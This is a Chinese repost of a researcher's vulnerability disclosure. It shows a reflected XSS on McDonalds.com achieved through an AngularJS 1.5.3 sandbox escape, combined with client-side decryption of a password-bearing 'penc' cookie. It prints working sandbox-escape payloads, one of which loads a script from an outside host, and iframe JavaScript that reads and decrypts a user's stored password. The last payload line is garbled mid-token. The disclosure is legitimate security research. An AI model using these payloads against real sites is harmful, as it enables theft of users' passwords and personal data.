AngularJS沙箱绕过:反射型XSS导致麦当劳用户密码泄露
<p>通过滥用一个不安全加密存储漏洞和反射型服务端跨站脚本漏洞就可以从麦当劳盗取并解密用户密码。除此之外,其他个人信息,如用户姓名、地址和联系方式都可能被盗。</p> <h2>Proof of Concept ( PoC )</h2> <h3>AngularJS沙箱绕过进行反射型XSS</h3> <p>McDonalds.com包括一个搜索页面在页面的源码上体现了一个搜索参数(q)的值。所以当我们在页面上搜索***********-test-reflected-test-***********的时候响应会如下所示:</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/edd4e1e5f8d6e53b2cbed442e896abfb.jpg"> <img src="https://simg.open-open.com/show/a183050fdbb429901f050baf1b6275ff.jpg"></p> <p>麦当劳使用AngularJS所以我们可以尝试使用搜索值列出唯一ID的范围。我们可以通过修改q参数为{{$id}}。我们可以看到{{$id}}被转换成9,AngularJS范围内唯一的ID(单调递增)。</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/ab9d819ed2829b13627e387b1e5aee3e.jpg"> <img src="https://simg.open-open.com/show/fa099cb21450c7eed16ea7cd7197440e.jpg"></p> <p>使用{{alert(1)}}并不会弹窗,因为所有的AngularJS代码都在沙箱中执行。然而 AngularJS沙箱是不安全的。事实上,它完全不应被信任。在1.6版本中甚至因为虚假安全而被移除。PortSwigger 写了一篇很好的博文关于AngularJS沙箱的逃离技术。</p> <p>我们首先要找到McDonalds.com的AngularJS版本。我们可以在 console执行angular.version</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/30dec697def4c40deb78684a4e617d28.jpg"></p> <p>版本是1.5.3,沙箱逃逸我们需要</p> <pre> <code class="language-javascript">{{x ={'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}</code></pre> <p>我们使用这个沙箱逃逸作为搜索值,并以此导致弹窗。</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/6b8d62b6f50664c4fbcbc241c3729a5d.jpg"></p> <p>我们甚至可以在沙箱逃逸后加载外部Javascript文件,并导致下面的弹窗。</p> <pre> <code class="language-javascript">{{x = {'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}` </code></pre> <p>因为麦当劳没有使用CSP(content-security-policy)头, Javascript可以被加载任意域名。</p> <h3 style="text-align:center"><img src="https://simg.open-open.com/show/6b8d62b6f50664c4fbcbc241c3729a5d.jpg"></h3> <h2>Proof of Concept(PoC)</h2> <h3>盗取用户密码</h3> <p>在McDonalds.com上我注意到的另一件事情是他们的登录页面,包含了一个非常特殊的复选框。正常来说你可以在登录过后选择“记住我”,但麦当劳的登录页面留给我们记住密码的选项。</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/2c8b141e4cef3b568af446f483b2002f.jpg"></p> <p>我在所有的Javascript中搜索password关键字并找到一些有趣的解密代码。</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/3da6de2350a92f1a33ac2d797c58ddd5.jpg"></p> <p style="text-align:center"><img src="https://simg.open-open.com/show/df96f106a0aa41e20616c7ea4f7c88d3.jpg"></p> <p>如果说有一件事情是不应该做的,那就是在客户端解密(甚至使用双向加密存储密码)。我尝试运行自己的代码,而且成功了!</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/f1b53f6437edf733b0ff69972985e44b.jpg"></p> <p>penc 是一个在cookie中存储一年的值。LOL !</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/ee5a56182e65bebaeb1428dee15e3b57.jpg"></p> <p>麦当劳使用CryptoJS来加密和解密敏感数据。他们为所有用户使用相同的Key(密钥 )和IV(初始化向量),这意味着我只要盗取了penc的cookie解密某人的密码</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/8e42edc02807e3fc92de1abeb492ca62.jpg"></p> <p>我尝试在搜索页面使用一个恶意搜索payload来解密我的密码,但没有成功。因为AngularJS 的沙箱逃逸载荷替代了chartAt方法为join方法,getcookie 方法失败了。getcookie方法会尝试通过检查charAt(0)是否为空格来去除 cookie值中的空格。在下图,你可以看到如果在搜索页面成功执行.charAt(0)返回字符串与 0 相联结。</p> <p style="text-align:center"><img src="https://simg.open-open.com/show/e017434a95e81c4e2f30cb8ad9b26810.jpg"> <img src="https://simg.open-open.com/show/6d19bc5cdb40cc7f40e3772804aba25c.jpg"></p> <p>我写了一些Javascript在主页上加载iframe ,并通过iframe盗取用户cookie 。因为沙箱逃逸的缘故,载荷需要执行多次,我跟踪变量 xssIsExecuted,这样 payload 只执行一次。</p> <pre> <code class="language-javascript">if (!window.xssIsExecuted) { window.xssIsExecuted = true; var iframe = $('<iframe src="https://www.mcdonalds.com/us/en-us.html"></iframe>'); $('body').append(iframe); iframe.on('load', function() { var penc = iframe[0].contentWindow.getCookie('penc'); alert(iframe[0].contentWindow.decrypt(penc)); }); } </code></pre> <p>现在我们可以使用下列沙箱逃逸,成功弹窗!</p> <pre> <code class="language-javascript">{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].jo donalds-password-stealer.js`)');}} </code></pre> <p style="text-align:center"><img src="https://simg.open-open.com/show/5f00a61b925f864bb791883d67c4dd13.jpg"></p> <p>这些都相当简单,我联系了麦当劳多次并报告问题,不幸的是他们没有任何回应,这就是为什么我决定披露此漏洞的原因。</p> <p> </p> <p>来自:http://www.freebuf.com/vuls/125932.html</p> <p> </p>
本文由用户 LouRandle 自行上传分享,仅供网友学习交流。所有权归原作者,若您的权利被侵害,请联系管理员。
转载本站原创文章,请注明出处,并保留原始链接、图片水印。
本站是一个以用户分享为主的开源技术平台,欢迎各类分享!